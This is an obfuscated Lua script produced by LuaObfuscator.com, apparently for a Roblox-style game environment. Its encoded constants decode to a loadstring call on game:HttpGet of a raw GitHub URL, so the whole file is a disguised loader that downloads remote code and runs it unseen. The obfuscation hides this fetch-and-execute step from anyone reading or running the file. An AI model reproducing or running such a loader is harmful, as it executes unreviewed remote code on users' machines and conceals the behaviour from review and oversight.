--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v72=0;local v73;while true do if (0==v72) then v73=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (v97==1) then return v98;end if (v97==0) then v98=v5(v73,v19);v19=nil;v97=1;end end else return v73;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v74=(v31/((2 -0)^(v32-(784 -(558 + 225)))))%((1 + (719 -(248 + 470)))^(((v33-(2 -1)) -(v32-(568 -(231 + 336)))) + 1)) ;return v74-(v74%(1 + 0)) ;else local v75=(1984 -(1783 + 199))^(v32-1) ;return (((v31%(v75 + v75))>=v75) and (582 -(193 + 388))) or (426 -(391 + 35)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v36 * (1248 -(617 + 375))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (1865 -(328 + 1533)) ;return (v40 * (16777520 -(222 + 9 + 73))) + (v39 * (67065 -(127 + 1402))) + (v38 * 256) + v37 ;end local function v24()local v41=0 + 0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==0) then v42=v23();v43=v23();v41=1;end if ((2 + 0)==v41) then v46=v20(v43,20 + 1 ,52 -(40 -19) );v47=((v20(v43,11 + 21 )==(1 -(0 + 0))) and  -1) or (819 -(62 + 756)) ;v41=8 -5 ;end if (v41==(305 -(22 + (851 -569)))) then v44=1 + 0 ;v45=(v20(v43,(636 -(191 + 443)) -1 ,5 + 15 ) * ((1 + 1)^(18 + 14))) + v42 ;v41=2;end if (v41==(2 + 1)) then if (v46==((0 -0) + 0)) then if (v45==((0 + 0) -0)) then return v47 * (0 + 0) ;else local v99=0;while true do if (v99==((10 + 2) -((21 -11) + 2))) then v46=1748 -(407 + 1340) ;v44=0 + (888 -(5 + 883)) ;break;end end end elseif (v46==(461 + 1586)) then return ((v45==(587 -(514 + 73))) and (v47 * ((1989 -(1979 + 9))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1051 -(14 + 14)) ) * (v44 + (v45/(2^((530 -349) -129)))) ;end end end local function v25(v48)local v49;if  not v48 then local v76=1076 -(395 + 681) ;while true do if (v76==(0 + 0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -((1985 -(334 + 1650)) + 0) );v18=v18 + v48 ;local v50={};for v65=211 -(33 + 177) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(4 -3)) then else v54=nil;v55=nil;v51=2;end if ((1439 -(774 + 662))~=v51) then else v58=nil;while true do local v90=0;local v91;while true do if (v90==0) then v91=0;while true do if (v91==(1992 -(824 + 1168))) then local v102=0;while true do if (v102==(2 -1)) then v91=424 -(121 + 302) ;break;end if (v102==(0 + 0)) then if (v52~=(1 + 0)) then else v57=v23();v58={};for v123=1,v57 do local v124=1265 -(505 + 760) ;local v125;local v126;local v127;local v128;while true do if (v124~=(436 -(41 + 395))) then else v125=0;v126=nil;v124=1;end if (v124==2) then while true do if (v125==(0 + 0)) then local v147=1414 -(1188 + 226) ;while true do if (v147==0) then v126=0;v127=nil;v147=1 + 0 ;end if ((1 + 0)~=v147) then else v125=1 + 0 ;break;end end end if ((1 + 0)==v125) then v128=nil;while true do if (v126==(1 + 0)) then if (v127==1) then v128=v21()~=(0 + 0) ;elseif (v127==(1 + 1)) then v128=v24();elseif (v127==3) then v128=v25();end v58[v123]=v128;break;end if (0==v126) then local v158=1141 -(232 + 909) ;local v159;local v160;while true do if (v158==(3 -2)) then while true do if (0==v159) then v160=0 -0 ;while true do if (v160==(1 + 0)) then v126=1 -0 ;break;end if (v160==0) then local v171=867 -(790 + 77) ;while true do if (v171==0) then v127=v21();v128=nil;v171=1477 -(1162 + 314) ;end if (v171==(1 + 0)) then v160=1 + 0 ;break;end end end end break;end end break;end if (v158==0) then v159=0 + 0 ;v160=nil;v158=1642 -(1086 + 555) ;end end end end break;end end break;end if (v124~=1) then else v127=nil;v128=nil;v124=2;end end end v56[3]=v21();v52=2;end if (v52==(3 -1)) then local v122=0 -0 ;while true do if (v122==0) then local v130=0;while true do if (v130~=(0 + 0)) then else for v148=1,v23() do local v149=0 + 0 ;local v150;local v151;local v152;while true do if (v149==1) then v152=nil;while true do if (v150==(0 -0)) then local v162=0 + 0 ;while true do if (v162~=1) then else v150=1 + 0 ;break;end if (v162==(1897 -(29 + 1868))) then v151=0 -0 ;v152=nil;v162=3 -2 ;end end end if (v150==1) then while true do if (0==v151) then v152=v21();if (v20(v152,1 + 0 ,1)~=(0 + 0)) then else local v166=0 -0 ;local v167;local v168;local v169;local v170;while true do if (v166==(303 -(136 + 166))) then v169=nil;v170=nil;v166=1 + 1 ;end if (v166==(0 -0)) then v167=0;v168=nil;v166=856 -(776 + 79) ;end if (v166==2) then while true do if (1==v167) then local v172=0 -0 ;while true do if (1~=v172) then else v167=2;break;end if (v172~=(0 -0)) then else v170={v22(),v22(),nil,nil};if (v168==(656 -(404 + 252))) then local v179=0 + 0 ;local v180;local v181;while true do if (v179==(0 + 0)) then v180=0;v181=nil;v179=3 -2 ;end if (1~=v179) then else while true do if (0~=v180) then else v181=0;while true do if (v181~=(1896 -(1123 + 773))) then else v170[7 -4 ]=v22();v170[10 -6 ]=v22();break;end end break;end end break;end end elseif (v168==1) then v170[3]=v23();elseif (v168==2) then v170[3]=v23() -(2^16) ;elseif (v168==3) then local v188=0;while true do if (v188~=0) then else v170[2 + 1 ]=v23() -((3 -1)^(38 -22)) ;v170[1 + 3 ]=v22();break;end end end v172=3 -2 ;end end end if (3~=v167) then else if (v20(v169,14 -11 ,6 -3 )~=1) then else v170[19 -15 ]=v58[v170[4]];end v53[v148]=v170;break;end if (v167==0) then local v174=0 -0 ;while true do if (v174==(934 -(863 + 71))) then v168=v20(v152,2,1 + 2 );v169=v20(v152,4,2 + 4 );v174=716 -(487 + 228) ;end if (v174==(222 -(216 + 5))) then v167=1;break;end end end if (2~=v167) then else local v175=1730 -(1029 + 701) ;while true do if (v175~=0) then else local v178=0 + 0 ;while true do if (v178==0) then if (v20(v169,3 -2 ,1 -0 )~=1) then else v170[2]=v58[v170[2]];end if (v20(v169,2 + 0 ,964 -(864 + 98) )~=1) then else v170[451 -(8 + 440) ]=v58[v170[3 + 0 ]];end v178=1491 -(436 + 1054) ;end if (1==v178) then v175=1 + 0 ;break;end end end if (v175==(1 + 0)) then v167=3;break;end end end end break;end end end break;end end break;end end break;end if (v149==(0 + 0)) then v150=0 + 0 ;v151=nil;v149=1;end end end for v153=1 + 0 ,v23() do v54[v153-(1962 -(1267 + 694)) ]=v28();end v130=1;end if ((1064 -(475 + 588))==v130) then v122=1634 -(819 + 814) ;break;end end end if (1~=v122) then else local v131=0;while true do if (v131~=0) then else for v155=1,v23() do v55[v155]=v23();end return v56;end end end end end v102=1;end end end if (v91~=1) then else if (v52==(0 + 0)) then v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=1;end break;end end break;end end end break;end if ((2 + 0)==v51) then v56=nil;v57=nil;v51=3;end if (v51==(935 -(363 + 572))) then v52=0 -0 ;v53=nil;v51=3 -2 ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=1;local v68= -1;local v69={...};local v70=v12("#",...) -1 ;local function v71()local v77=v62;local v78=v63;local v79=v64;local v80=v27;local v81={};local v82={};local v83={};for v87=1089 -(538 + 551) ,v70 do if ((v87>=v79) or (820>=(2362 + 510))) then v81[v87-v79 ]=v69[v87 + (134 -(72 + 61)) ];else v83[v87]=v69[v87 + 1 + 0 ];end end local v84=(v70-v79) + 1 + 0 ;local v85;local v86;while true do local v88=1347 -((1623 -939) + 663) ;while true do if ((v88==(858 -(679 + 178))) or (879>=(4352 -(291 + 37)))) then if ((v86<=(9 -7)) or (3404==(6244 -(1659 + 210)))) then if ((v86<=(0 -0)) or ((2293 -1295)>(1638 + 1814))) then local v103=1914 -(1673 + 241) ;local v104;local v105;local v106;local v107;local v108;local v109;while true do if ((v103==(1 + 1)) or ((5185 -(318 + 357 + 397))<=((2024 -(255 + 1262)) -253))) then v108=nil;v109=nil;v103=445 -(240 + 202) ;end if ((0==v103) or ((1082 + 3262)<=(641 -(2250 -(474 + 1377))))) then v104=0 + 0 ;v105=nil;v103=1 -0 ;end if ((2497<=(9883 -(6714 -(920 + 150)))) and (v103==(913 -(575 + 335)))) then while true do if ((v104==(1783 -((1706 -(581 + 421)) + 1077))) or (2721==(3603 -(1157 + 590)))) then v109=nil;while true do if (((3842 -(738 + 685))<(4028 + 428)) and (v105==((2 + 0) -0))) then for v143=v106,v68 do local v144=0 + 0 + 0 ;local v145;local v146;while true do if ((v144==(964 -(555 + 408))) or (((9933 -5895) -(204 + (1613 -(213 + 140))))>3182)) then while true do if ((v145==0) or ((577 + 44)>=(3504 -2132))) then v146=(21 + 26) -(8 + 39) ;while true do if (((2998 -(869 + 216))<(1557 + (4739 -3772))) and (v146==(1646 -(347 + 1299)))) then v109=v109 + (2 -1) ;v83[v143]=v107[v109];break;end end break;end end break;end if (((6225 -3434)==(1413 + 400 + (1964 -(897 + 89)))) and (v144==((1537 -(904 + 282)) -(202 + 149)))) then v145=0 -0 ;v146=nil;v144=1;end end end break;end if ((v105==(1947 -(88 + 1859))) or ((1980 -674)>(4735 -(204 + 264)))) then local v139=1518 -((613 -359) + 1264) ;local v140;while true do if (((5804 -(1762 + 51))>=739) and (v139==(0 + 0))) then v140=147 -(81 + 66) ;while true do if (((290 + 2085)>(214 + 842)) and (v140==(1 + 0))) then v105=1 + 0 ;break;end if (((1359 -(222 + 179))<=3895) and (v140==(0 -0))) then local v161=0 + 0 ;while true do if ((v161==1) or ((3849 -1990)>=((11315 -(879 + 266)) -5921))) then v140=(548 -(23 + 524)) + 0 ;break;end if ((v161==(0 + 0)) or ((57 + 675)==(5427 -1954))) then v106=v85[3 -1 ];v107,v108=v80(v83[v106](v13(v83,v106 + (1565 -(1549 + 15)) ,v85[651 -(355 + 293) ])));v161=1981 -(96 + 1884) ;end end end end break;end end end if ((v105==(1 + 0)) or ((14772 -11792)==((997 -234) + 85))) then local v141=0 + 0 ;local v142;while true do if (((13721 -10087)==(4959 -((1813 -(713 + 533)) + 758))) and (v141==(0 + 0))) then v142=829 -(525 + 304) ;while true do if ((v142==(1 + 0)) or ((6450 -2063)<=(4557 -(1052 + 648)))) then v105=2 -0 ;break;end if (((6605 -(21 + 1688))==(5065 -(22 + 147))) and ((1639 -(1424 + 215))==v142)) then v68=(v108 + v106) -(1 -0) ;v109=0 -0 ;v142=936 -(89 + 846) ;end end break;end end end end break;end if (((3699 -(391 + (3540 -2433)))>(414 + (2277 -(241 + 436)))) and (v104==(0 + 0))) then v105=0 -0 ;v106=nil;v104=362 -(293 + 68) ;end if ((v104==1) or ((2910 + 340)<=(3467 -(1165 + 124)))) then local v129=0 + 0 ;while true do if (((2162 -(1289 + 284))<=(4773 -(928 + 889))) and (v129==(1724 -(1108 + 615)))) then v104=2 -0 ;break;end if (((7181 -3842)>(6819 -5168)) and (v129==(0 + 0))) then v107=nil;v108=nil;v129=1 + 0 ;end end end end break;end if ((2481==(2872 -(95 + 136 + 103 + 57))) and (v103==(1 + 0))) then v106=nil;v107=nil;v103=409 -(201 + 206) ;end end elseif (((10169 -6732)>(480 + 834)) and (v86==1)) then v83[v85[4 -2 ]]();else local v110=0 + 0 ;local v111;local v112;local v113;while true do if ((v110==(419 -(236 + 183))) or ((4394 -(943 + 188 + 847))<(4103 -(519 + 1479)))) then v111=0 + 0 ;v112=nil;v110=1;end if ((2551>=(3597 -(424 + 1057))) and (v110==1)) then v113=nil;while true do if (((8196 -4519)>(1716 -(653 + 14))) and (v111==1)) then v83[v112 + ((173 -(24 + 146)) -(5 -3)) ]=v113;v83[v112]=v113[v85[4]];break;end if (((1155 + 3746)>(2235 + 2616)) and (v111==0)) then v112=v85[615 -(560 + 53) ];v113=v83[v85[3]];v111=1337 -(1304 + 32) ;end end break;end end end elseif (((1847 -(1102 + 387))<=(978 + (9106 -5193))) and (v86<=(6 -2))) then if ((v86==(2 + 1)) or ((813 + 82)>=1932)) then local v114=0 -0 ;local v115;local v116;while true do if ((3141>(2092 -(891 + 81))) and (v114==(0 -0))) then v115=0 -(526 -(514 + 12)) ;v116=nil;v114=1;end if (((4711 -(506 + 164))>=(5024 -(463 + 526))) and (v114==(1 + 0))) then while true do if (((0 -0)==v115) or ((3688 -(546 + 1))==(16049 -12371))) then v116=v85[1 + 1 ];v83[v116]=v83[v116](v13(v83,v116 + (2 -1) ,v68));break;end end break;end end else do return;end end elseif ((v86>(1 + 4)) or ((4 + 5 + 0)>=3651)) then v83[v85[2]]=v85[3];else v83[v85[5 -3 ]]=v61[v85[2 + 1 ]];end v67=v67 + (1401 -((27 -12) + 1385)) ;break;end if (((0 + 0)==v88) or (3379<=2736)) then local v96=1347 -(395 + 952) ;while true do if (((449 -(105 + 36 + 308))==v96) or ((4675 -(870 + 49))<=(2355 -(444 + 33)))) then v85=v77[v67];v86=v85[1];v96=1 + 0 ;end if (((2359 -957)>=(516 -(1490 -(869 + 279)))) and (v96==((1 + 1) -1))) then v88=1 -0 ;break;end end end end end end A,B=v27(v11(v71));if  not A[1] then local v89=v59[4][v67] or "?" ;error("Script error at ["   .. v89   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F636F636261626172716570722F7363726970745F302F6D61696E2F73637269707400083O0012053O00013O001205000100023O002002000100010003001206000300046O000100034O00035O00022O00013O000100012O00043O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end